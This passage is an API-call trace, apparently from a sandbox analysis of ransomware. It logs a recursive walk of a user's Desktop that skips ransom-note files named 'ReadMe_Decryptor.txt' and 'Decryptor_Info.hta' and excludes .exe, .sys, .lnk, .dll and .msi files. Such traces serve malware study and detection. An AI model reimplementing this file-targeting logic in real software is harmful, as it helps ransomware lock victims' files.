ftCreationTime.dwLowDateTime=0x90a589f0, ftCreationTime.dwHighDateTime=0x1d5e295, ftLastAccessTime.dwLowDateTime=0xa20b40c0, ftLastAccessTime.dwHighDateTime=0x1d5e346, ftLastWriteTime.dwLowDateTime=0xa20b40c0, ftLastWriteTime.dwHighDateTime=0x1d5e346, nFileSizeHigh=0x0, nFileSizeLow=0x6ab, dwReserved0=0x0, dwReserved1=0x0, cFileName="e6vzzyd4iS6Nzn0.xls", cAlternateFileName="E6VZZY~1.XLS")) returned 1 [0077.775] lstrcmpW (lpString1="e6vzzyd4iS6Nzn0.xls", lpString2=".") returned 1 [0077.775] lstrcmpW (lpString1="e6vzzyd4iS6Nzn0.xls", lpString2="..") returned 1 [0077.775] lstrcmpiW (lpString1="e6vzzyd4iS6Nzn0.xls", lpString2="ReadMe_Decryptor.txt") returned -1 [0077.775] lstrcmpiW (lpString1="e6vzzyd4iS6Nzn0.xls", lpString2="Decryptor_Info.hta") returned 1 [0077.775] PathFindExtensionW (pszPath="e6vzzyd4iS6Nzn0.xls") returned=".xls" [0077.775] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0077.775] lstrcmpiW (lpString1=".xls", lpString2=".sys") returned 1 [0077.775] lstrcmpiW (lpString1=".xls", lpString2=".lnk") returned 1 [0077.775] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0077.775] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0077.775] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x6f6970 [0077.775] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x705a68 [0077.775] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f6970 | out: hHeap=0x6d0000) returned 1 [0077.775] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x705af0 [0077.776] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x705a68 | out: hHeap=0x6d0000) returned 1 [0077.776] FindNextFileW (in: hFindFile=0x70d6c0, lpFindFileData=0x28e128 | out: lpFindFileData=0x28e128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf3a8fe0, ftCreationTime.dwHighDateTime=0x1d5e798, ftLastAccessTime.dwLowDateTime=0xffb9a010, ftLastAccessTime.dwHighDateTime=0x1d5df84, ftLastWriteTime.dwLowDateTime=0xffb9a010, ftLastWriteTime.dwHighDateTime=0x1d5df84, nFileSizeHigh=0x0, nFileSizeLow=0x10c90, dwReserved0=0x0, dwReserved1=0x0, cFileName="eG_eSoP3GaS5ub.swf", cAlternateFileName="EG_ESO~1.SWF")) returned 1 [0077.776] lstrcmpW (lpString1="eG_eSoP3GaS5ub.swf", lpString2=".") returned 1 [0077.776] lstrcmpW (lpString1="eG_eSoP3GaS5ub.swf", lpString2="..") returned 1 [0077.776] lstrcmpiW (lpString1="eG_eSoP3GaS5ub.swf", lpString2="ReadMe_Decryptor.txt") returned -1 [0077.776] lstrcmpiW (lpString1="eG_eSoP3GaS5ub.swf", lpString2="Decryptor_Info.hta") returned 1 [0077.776] PathFindExtensionW (pszPath="eG_eSoP3GaS5ub.swf") returned=".swf" [0077.776] lstrcmpiW (lpString1=".swf", lpString2=".exe") returned 1 [0077.776] lstrcmpiW (lpString1=".swf", lpString2=".sys") returned -1 [0077.776] lstrcmpiW (lpString1=".swf", lpString2=".lnk") returned 1 [0077.776] lstrcmpiW (lpString1=".swf", lpString2=".dll") returned 1 [0077.776] lstrcmpiW (lpString1=".swf", lpString2=".msi") returned 1 [0077.776] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x6f6970 [0077.776] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x705a68 [0077.776] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f6970 | out: hHeap=0x6d0000) returned 1 [0077.776] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x703920 [0077.776] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x705a68 | out: hHeap=0x6d0000) returned 1 [0077.776] FindNextFileW (in: hFindFile=0x70d6c0, lpFindFileData=0x28e128 | out: lpFindFileData=0x28e128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x46b86430, ftCreationTime.dwHighDateTime=0x1d5dfe2, ftLastAccessTime.dwLowDateTime=0x1eaf93f0, ftLastAccessTime.dwHighDateTime=0x1d5de2f, ftLastWriteTime.dwLowDateTime=0x1eaf93f0, ftLastWriteTime.dwHighDateTime=0x1d5de2f, nFileSizeHigh=0x0, nFileSizeLow=0x263e, dwReserved0=0x0, dwReserved1=0x0, cFileName="EUG9E.mp3", cAlternateFileName="")) returned 1 [0077.776] lstrcmpW (lpString1="EUG9E.mp3", lpString2=".") returned 1 [0077.776] lstrcmpW (lpString1="EUG9E.mp3", lpString2="..") returned 1 [0077.776] lstrcmpiW (lpString1="EUG9E.mp3", lpString2="ReadMe_Decryptor.txt") returned -1 [0077.776] lstrcmpiW (lpString1="EUG9E.mp3", lpString2="Decryptor_Info.hta") returned 1 [0077.776] PathFindExtensionW (pszPath="EUG9E.mp3") returned=".mp3" [0077.776] lstrcmpiW (lpString1=".mp3", lpString2=".exe") returned 1 [0077.777] lstrcmpiW (lpString1=".mp3", lpString2=".sys") returned -1 [0077.777] lstrcmpiW (lpString1=".mp3", lpString2=".lnk") returned 1 [0077.777] lstrcmpiW (lpString1=".mp3", lpString2=".dll") returned 1 [0077.777] lstrcmpiW (lpString1=".mp3", lpString2=".msi") returned -1 [0077.777] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x6f6970 [0077.777] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x76) returned 0x6e25e8 [0077.777] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f6970 | out: hHeap=0x6d0000) returned 1 [0077.777] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x705b78 [0077.777] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e25e8 | out: hHeap=0x6d0000) returned 1 [0077.777] FindNextFileW (in: hFindFile=0x70d6c0, lpFindFileData=0x28e128 | out: lpFindFileData=0x28e128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1cf989f0, ftCreationTime.dwHighDateTime=0x1d5e70b, ftLastAccessTime.dwLowDateTime=0xd5ac6f00, ftLastAccessTime.dwHighDateTime=0x1d5df6b, ftLastWriteTime.dwLowDateTime=0xd5ac6f00, ftLastWriteTime.dwHighDateTime=0x1d5df6b, nFileSizeHigh=0x0, nFileSizeLow=0x60c7, dwReserved0=0x0, dwReserved1=0x0, cFileName="ForGKyvpOl.swf", cAlternateFileName="FORGKY~1.SWF")) returned 1 [0077.777] lstrcmpW (lpString1="ForGKyvpOl.swf", lpString2=".") returned 1 [0077.777] lstrcmpW (lpString1="ForGKyvpOl.swf", lpString2="..") returned 1 [0077.777] lstrcmpiW (lpString1="ForGKyvpOl.swf", lpString2="ReadMe_Decryptor.txt") returned -1 [0077.777] lstrcmpiW (lpString1="ForGKyvpOl.swf", lpString2="Decryptor_Info.hta") returned 1 [0077.777] PathFindExtensionW (pszPath="ForGKyvpOl.swf") returned=".swf" [0077.777] lstrcmpiW (lpString1=".swf", lpString2=".exe") returned 1 [0077.777] lstrcmpiW (lpString1=".swf", lpString2=".sys") returned -1 [0077.777] lstrcmpiW (lpString1=".swf", lpString2=".lnk") returned 1 [0077.777] lstrcmpiW (lpString1=".swf", lpString2=".dll") returned 1 [0077.777] lstrcmpiW (lpString1=".swf", lpString2=".msi") returned 1 [0077.777] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x6f6970 [0077.777] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x76) returned 0x6e25e8 [0077.777] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f6970 | out: hHeap=0x6d0000) returned 1 [0077.777] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x70) returned 0x705a68 [0077.777] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e25e8 | out: hHeap=0x6d0000) returned 1 [0077.777] FindNextFileW (in: hFindFile=0x70d6c0, lpFindFileData=0x28e128 | out: lpFindFileData=0x28e128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc364cd10, ftCreationTime.dwHighDateTime=0x1d5db1f, ftLastAccessTime.dwLowDateTime=0x8d7362d0, ftLastAccessTime.dwHighDateTime=0x1d5e253, ftLastWriteTime.dwLowDateTime=0x8d7362d0, ftLastWriteTime.dwHighDateTime=0x1d5e253, nFileSizeHigh=0x0, nFileSizeLow=0x1703e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Gu4AkFdp.mkv", cAlternateFileName="")) returned 1 [0077.777] lstrcmpW (lpString1="Gu4AkFdp.mkv", lpString2=".") returned 1 [0077.778] lstrcmpW (lpString1="Gu4AkFdp.mkv", lpString2="..") returned 1 [0077.778] lstrcmpiW (lpString1="Gu4AkFdp.mkv", lpString2="ReadMe_Decryptor.txt") returned -1 [0077.778] lstrcmpiW (lpString1="Gu4AkFdp.mkv", lpString2="Decryptor_Info.hta") returned 1 [0077.778] PathFindExtensionW (pszPath="Gu4AkFdp.mkv") returned=".mkv" [0077.778] lstrcmpiW (lpString1=".mkv", lpString2=".exe") returned 1 [0077.778] lstrcmpiW (lpString1=".mkv", lpString2=".sys") returned -1 [0077.778] lstrcmpiW (lpString1=".mkv", lpString2=".lnk") returned 1 [0077.778] lstrcmpiW (lpString1=".mkv", lpString2=".dll") returned 1 [0077.778] lstrcmpiW (lpString1=".mkv", lpString2=".msi") returned -1 [0077.778] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x6f6970 [0077.778] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x76) returned 0x6e25e8 [0077.778] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f6970 | out: hHeap=0x6d0000) returned 1 [0077.778] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x70) returned 0x7039a8 [0077.778] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e25e8 | out: hHeap=0x6d0000) returned 1 [0077.778] FindNextFileW (in: hFindFile=0x70d6c0, lpFindFileData=0x28e128 | out: lpFindFileData=0x28e128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3d09c60, ftCreationTime.dwHighDateTime=0x1d5dafa, ftLastAccessTime.dwLowDateTime=0x70c9ace0, ftLastAccessTime.dwHighDateTime=0x1d5e10c, ftLastWriteTime.dwLowDateTime=0x70c9ace0, ftLastWriteTime.dwHighDateTime=0x1d5e10c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="iBv5EKoZPKsYY3c2pl", cAlternateFileName="IBV5EK~1")) returned 1 [0077.778] lstrcmpW (lpString1="iBv5EKoZPKsYY3c2pl", lpString2=".") returned 1 [0077.778] lstrcmpW (lpString1="iBv5EKoZPKsYY3c2pl", lpString2="..") returned 1 [0077.778] lstrlenW (lpString="iBv5EKoZPKsYY3c2pl") returned 18 [0077.778] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="iBv5EKoZPKsYY3c2pl" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\iBv5EKoZPKsYY3c2pl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\iBv5EKoZPKsYY3c2pl" [0077.778] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\iBv5EKoZPKsYY3c2pl", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\iBv5EKoZPKsYY3c2pl\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\iBv5EKoZPKsYY3c2pl\\" [0077.778] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\iBv5EKoZPKsYY3c2pl\\") returned 57 [0077.778] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\iBv5EKoZPKsYY3c2pl\\*", fInfoLevelId=0x0, lpFindFileData=0x28e128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28e128) returned 0x70d700 [0077.779] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0077.779] FindNextFileW (in: hFindFile=0x70d700, lpFindFileData=0x28e128 | out: lpFindFileData=0x28e128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3d09c60, ftCreationTime.dwHighDateTime=0x1d5dafa, ftLastAccessTime.dwLowDateTime=0x70c9ace0, ftLastAccessTime.dwHighDateTime=0x1d5e10c, ftLastWriteTime.dwLowDateTime=0x70c9ace0, ftLastWriteTime.dwHighDateTime=0x1d5e10c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0077.780] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0077.780] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0077.780] FindNextFileW (in: hFindFile=0x70d700, lpFindFileData=0x28e128 | out: lpFindFileData=0x28e128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8cb78fb0, ftCreationTime.dwHighDateTime=0x1d5e47e, ftLastAccessTime.dwLowDateTime=0x4329e8c0, ftLastAccessTime.dwHighDateTime=0x1d5d9ac, ftLastWriteTime.dwLowDateTime=0x4329e8c0, ftLastWriteTime.dwHighDateTime=0x1d5d9ac, nFileSizeHigh=0x0, nFileSizeLow=0x17b5a, dwReserved0=0x0, dwReserved1=0x0, cFileName="lDEuxX-bWpZ.wav", cAlternateFileName="LDEUXX~1.WAV")) returned 1 [0077.780] lstrcmpW (lpString1="lDEuxX-bWpZ.wav", lpString2=".") returned 1 [0077.780] lstrcmpW (lpString1="lDEuxX-bWpZ.wav", lpString2="..") returned 1 [0077.780] lstrcmpiW (lpString1="lDEuxX-bWpZ.wav", lpString2="ReadMe_Decryptor.txt") returned -1 [0077.780] lstrcmpiW (lpString1="lDEuxX-bWpZ.wav", lpString2="Decryptor_Info.hta") returned 1 [0077.780] PathFindExtensionW (pszPath="lDEuxX-bWpZ.wav") returned=".wav" [0077.780] lstrcmpiW (lpString1=".wav", lpString2=".exe") returned 1 [0077.780] lstrcmpiW (lpString1=".wav", lpString2=".sys") returned 1 [0077.780] lstrcmpiW (lpString1=".wav", lpString2=".lnk") returned 1 [0077.780] lstrcmpiW (lpString1=".wav", lpString2=".dll") returned 1 [0077.780] lstrcmpiW (lpString1=".wav", lpString2=".msi") returned 1 [0077.781] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x6eb5c0 [0077.781] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xbe) returned 0x70a9c8 [0077.781] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6eb5c0 | out: hHeap=0x6d0000) returned 1 [0077.781] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x70aa90 [0077.781] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70a9c8 | out: hHeap=0x6d0000) returned 1 [0077.781] FindNextFileW (in: hFindFile=0x70d700, lpFindFileData=0x28e128 | out: lpFindFileData=0x28e128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb3fedbd0, ftCreationTime.dwHighDateTime=0x1d5e50c, ftLastAccessTime.dwLowDateTime=0x33227390, ftLastAccessTime.dwHighDateTime=0x1d5e229, ftLastWriteTime.dwLowDateTime=0x33227390, ftLastWriteTime.dwHighDateTime=0x1d5e229, nFileSizeHigh=0x0, nFileSizeLow=0x17c3b, dwReserved0=0x0, dwReserved1=0x0, cFileName="tD8goI-0GaEVfpr.mkv", cAlternateFileName="TD8GOI~1.MKV")) returned 1 [0077.781] lstrcmpW (lpString1="tD8goI-0GaEVfpr.mkv", lpString2=".") returned 1 [0077.781] lstrcmpW (lpString1="tD8goI-0GaEVfpr.mkv", lpString2="..") returned 1 [0077.781] lstrcmpiW (lpString1="tD8goI-0GaEVfpr.mkv", lpString2="ReadMe_Decryptor.txt") returned 1 [0077.781] lstrcmpiW (lpString1="tD8goI-0GaEVfpr.mkv", lpString2="Decryptor_Info.hta") returned 1 [0077.781] PathFindExtensionW (pszPath="tD8goI-0GaEVfpr.mkv") returned=".mkv" [0077.781] lstrcmpiW (lpString1=".mkv", lpString2=".exe") returned 1 [0077.781] lstrcmpiW (lpString1=".mkv", lpString2=".sys") returned -1 [0077.781] lstrcmpiW (lpString1=".mkv", lpString2=".lnk") returned 1 [0077.781] lstrcmpiW (lpString1=".mkv", lpString2=".dll") returned 1 [0077.781] lstrcmpiW (lpString1=".mkv", lpString2=".msi") returned -1 [0077.781] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x6eb5c0 [0077.781] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xbe) returned 0x70a9c8 [0077.781] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6eb5c0 | out: hHeap=0x6d0000) returned 1 [0077.781] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x6edb90 [0077.781] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70a9c8 | out: hHeap=0x6d0000) returned 1 [0077.781] FindNextFileW (in: hFindFile=0x70d700, lpFindFileData=0x28e128 | out: lpFindFileData=0x28e128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xab9409a0, ftCreationTime.dwHighDateTime=0x1d5d81b, ftLastAccessTime.dwLowDateTime=0x6ac5fad0, ftLastAccessTime.dwHighDateTime=0x1d5dffc, ftLastWriteTime.dwLowDateTime=0x6ac5fad0, ftLastWriteTime.dwHighDateTime=0x1d5dffc, nFileSizeHigh=0x0, nFileSizeLow=0x145d1, dwReserved0=0x0, dwReserved1=0x0, cFileName="TxvVhQLw9w.m4a", cAlternateFileName="TXVVHQ~1.M4A")) returned 1 [0077.781] lstrcmpW (lpString1="TxvVhQLw9w.m4a", lpString2=".") returned 1 [0077.781] lstrcmpW (lpString1="TxvVhQLw9w.m4a", lpString2="..") returned 1 [0077.781] lstrcmpiW (lpString1="TxvVhQLw9w.m4a", lpString2="ReadMe_Decryptor.txt") returned 1 [0077.781] lstrcmpiW (lpString1="TxvVhQLw9w.m4a", lpString2="Decryptor_Info.hta") returned 1 [0077.781] PathFindExtensionW (pszPath="TxvVhQLw9w.m4a") returned=".m4a" [0077.781] lstrcmpiW (lpString1=".m4a", lpString2=".exe") returned 1 [0077.782] lstrcmpiW (lpString1=".m4a", lpString2=".sys") returned -1 [0077.782] lstrcmpiW (lpString1=".m4a", lpString2=".lnk") returned 1 [0077.782] lstrcmpiW (lpString1=".m4a", lpString2=".dll") returned 1 [0077.782] lstrcmpiW (lpString1=".m4a", lpString2=".msi") returned -1 [0077.782] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x6eb5c0 [0077.782] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xbe) returned 0x70a9c8 [0077.782] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6eb5c0 | out: hHeap=0x6d0000) returned 1 [0077.782] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x70ab38 [0077.782] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70a9c8 | out: hHeap=0x6d0000) returned 1 [0077.782] FindNextFileW (in: hFindFile=0x70d700, lpFindFileData=0x28e128 | out: lpFindFileData=0x28e128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd29aea0, ftCreationTime.dwHighDateTime=0x1d5e608, ftLastAccessTime.dwLowDateTime=0x88dafa0, ftLastAccessTime.dwHighDateTime=0x1d5e297, ftLastWriteTime.dwLowDateTime=0x88dafa0, ftLastWriteTime.dwHighDateTime=0x1d5e297, nFileSizeHigh=0x0, nFileSizeLow=0x8c3d, dwReserved0=0x0, dwReserved1=0x0, cFileName="ymOAZf.ppt", cAlternateFileName="")) returned 1 [0077.782] lstrcmpW (lpString1="ymOAZf.ppt", lpString2=".") returned 1 [0077.782] lstrcmpW (lpString1="ymOAZf.ppt", lpString2="..") returned 1 [0077.782] lstrcmpiW (lpString1="ymOAZf.ppt", lpString2="ReadMe_Decryptor.txt") returned 1 [0077.782] lstrcmpiW (lpString1="ymOAZf.ppt", lpString2="Decryptor_Info.hta") returned 1 [0077.782] PathFindExtensionW (pszPath="ymOAZf.ppt") returned=".ppt" [0077.782] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0077.782] lstrcmpiW (lpString1=".ppt", lpString2=".sys") returned -1 [0077.782] lstrcmpiW (lpString1=".ppt", lpString2=".lnk") returned 1 [0077.782] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0077.782] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0077.782] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x6eb5c0 [0077.782] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xbe) returned 0x70a9c8 [0077.782] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6eb5c0 | out: hHeap=0x6d0000) returned 1 [0077.782] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x6edc38 [0077.782] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70a9c8 | out: hHeap=0x6d0000) returned 1 [0077.782] FindNextFileW (in: hFindFile=0x70d700, lpFindFileData=0x28e128 | out: lpFindFileData=0x28e128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd29aea0, ftCreationTime.dwHighDateTime=0x1d5e608, ftLastAccessTime.dwLowDateTime=0x88dafa0, ftLastAccessTime.dwHighDateTime=0x1d5e297, ftLastWriteTime.dwLowDateTime=0x88dafa0, ftLastWriteTime.dwHighDateTime=0x1d5e297, nFileSizeHigh=0x0, nFileSizeLow=0x8c3d, dwReserved0=0x0, dwReserved1=0x0, cFileName="ymOAZf.ppt", cAlternateFileName="")) returned 0 [0077.782] FindClose (in: hFindFile=0x70d700 | out: hFindFile=0x70d700) returned 1 [0077.782] FindNextFileW (in: hFindFile=0x70d6c0, lpFindFileData=0x28e128 | out: lpFindFileData=0x28e128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x543d9b0, ftCreationTime.dwHighDateTime=0x1d5da71, ftLastAccessTime.dwLowDateTime=0x22335890, ftLastAccessTime.dwHighDateTime=0x1d5e2c6, ftLastWriteTime.dwLowDateTime=0x22335890, ftLastWriteTime.dwHighDateTime=0x1d5e2c6, nFileSizeHigh=0x0, nFileSizeLow=0x163b9, dwReserved0=0x0, dwReserved1=0x0, cFileName="iE jK0f.pptx", cAlternateFileName="IEJK0F~1.PPT")) returned 1 [0077.782] lstrcmpW (lpString1="iE jK0f.pptx", lpString2=".") returned 1 [0077.783] lstrcmpW (lpString1="iE jK0f.pptx", lpString2="..") returned 1 [0077.783] lstrcmpiW (lpString1="iE jK0f.pptx", lpString2="ReadMe_Decryptor.txt") returned -1 [0077.783] lstrcmpiW (lpString1="iE jK0f.pptx", lpString2="Decryptor_Info.hta") returned 1 [0077.783] PathFindExtensionW (pszPath="iE jK0f.pptx") returned=".pptx" [0077.783] lstrcmpiW (lpString1=".pptx", lpString2=".exe") returned 1 [0077.783] lstrcmpiW (lpString1=".pptx", lpString2=".sys") returned -1 [0077.783] lstrcmpiW (lpString1=".pptx", lpString2=".lnk") returned 1 [0077.783] lstrcmpiW (lpString1=".pptx", lpString2=".dll") returned 1 [0077.783] lstrcmpiW (lpString1=".pptx", lpString2=".msi") returned 1 [0077.783] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x6f6970 [0077.783] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x76) returned 0x6e25e8 [0077.783] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f6970 | out: hHeap=0x6d0000) returned 1 [0077.783] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x70) returned 0x703a20 [0077.783] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e25e8 | out: hHeap=0x6d0000) returned 1 [0077.783] FindNextFileW (in: hFindFile=0x70d6c0, lpFindFileData=0x28e128 | out: lpFindFileData=0x28e128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf8bfccc0, ftCreationTime.dwHighDateTime=0x1d5e16a, ftLastAccessTime.dwLowDateTime=0x793a6ff0, ftLastAccessTime.dwHighDateTime=0x1d5e3e0, ftLastWriteTime.dwLowDateTime=0x793a6ff0, ftLastWriteTime.dwHighDateTime=0x1d5e3e0, nFileSizeHigh=0x0, nFileSizeLow=0x8034, dwReserved0=0x0, dwReserved1=0x0, cFileName="Msox.ots", cAlternateFileName="")) returned 1 [0077.783] lstrcmpW (lpString1="Msox.ots", lpString2=".") returned 1 [0077.783] lstrcmpW (lpString1="Msox.ots", lpString2="..") returned 1 [0077.783] lstrcmpiW (lpString1="Msox.ots", lpString2="ReadMe_Decryptor.txt") returned -1 [0077.783] lstrcmpiW (lpString1="Msox.ots", lpString2="Decryptor_Info.hta") returned 1 [0077.783] PathFindExtensionW (pszPath="Msox.ots") returned=".ots" [0077.783] lstrcmpiW (lpString1=".ots", lpString2=".exe") returned 1 [0077.783] lstrcmpiW (lpString1=".ots", lpString2=".sys") returned -1 [0077.783] lstrcmpiW (lpString1=".ots", lpString2=".lnk") returned 1 [0077.783] lstrcmpiW (lpString1=".ots", lpString2=".dll") returned 1 [0077.783] lstrcmpiW (lpString1=".ots", lpString2=".msi") returned 1 [0077.783] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x6f6970 [0077.783] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x76) returned 0x6e25e8 [0077.783] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f6970 | out: hHeap=0x6d0000) returned 1 [0077.783] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x70a9c8 [0077.783] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e25e8 | out: hHeap=0x6d0000) returned 1 [0077.783] FindNextFileW (in: hFindFile=0x70d6c0, lpFindFileData=0x28e128 | out: lpFindFileData=0x28e128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1d2d940, ftCreationTime.dwHighDateTime=0x1d5e066, ftLastAccessTime.dwLowDateTime=0xab2c0cc0, ftLastAccessTime.dwHighDateTime=0x1d5d7de, ftLastWriteTime.dwLowDateTime=0xab2c0cc0, ftLastWriteTime.dwHighDateTime=0x1d5d7de, nFileSizeHigh=0x0, nFileSizeLow=0x9652, dwReserved0=0x0, dwReserved1=0x0, cFileName="mWLyWGy_QWFT.wav", cAlternateFileName="MWLYWG~1.WAV")) returned 1 [0077.783] lstrcmpW (lpString1="mWLyWGy_QWFT.wav", lpString2=".") returned 1 [0077.783] lstrcmpW (lpString1="mWLyWGy_QWFT.wav", lpString2="..") returned 1 [0077.783] lstrcmpiW (lpString1="mWLyWGy_QWFT.wav", lpString2="ReadMe_Decryptor.txt") returned -1 [0077.783] lstrcmpiW (lpString1="mWLyWGy_QWFT.wav", lpString2="Decryptor_Info.hta") returned 1 [0077.784] PathFindExtensionW (pszPath="mWLyWGy_QWFT.wav") returned=".wav" [0077.784] lstrcmpiW (lpString1=".wav", lpString2=".exe") returned 1 [0077.784] lstrcmpiW (lpString1=".wav", lpString2=".sys") returned 1 [0077.784] lstrcmpiW (lpString1=".wav", lpString2=".lnk") returned 1 [0077.784] lstrcmpiW (lpString1=".wav", lpString2=".dll") returned 1 [0077.784] lstrcmpiW (lpString1=".wav", lpString2=".msi") returned 1 [0077.784] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x6f6970 [0077.784] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x76) returned 0x6e25e8 [0077.784] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f6970 | out: hHeap=0x6d0000) returned 1 [0077.784] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x70) returned 0x6edcd0 [0077.784] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e25e8 | out: hHeap=0x6d0000) returned 1 [0077.784] FindNextFileW (in: hFindFile=0x70d6c0, lpFindFileData=0x28e128 | out: lpFindFileData=0x28e128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a27d1b0, ftCreationTime.dwHighDateTime=0x1d5e71e, ftLastAccessTime.dwLowDateTime=0x1340d70, ftLastAccessTime.dwHighDateTime=0x1d5d866, ftLastWriteTime.dwLowDateTime=0x1340d70, 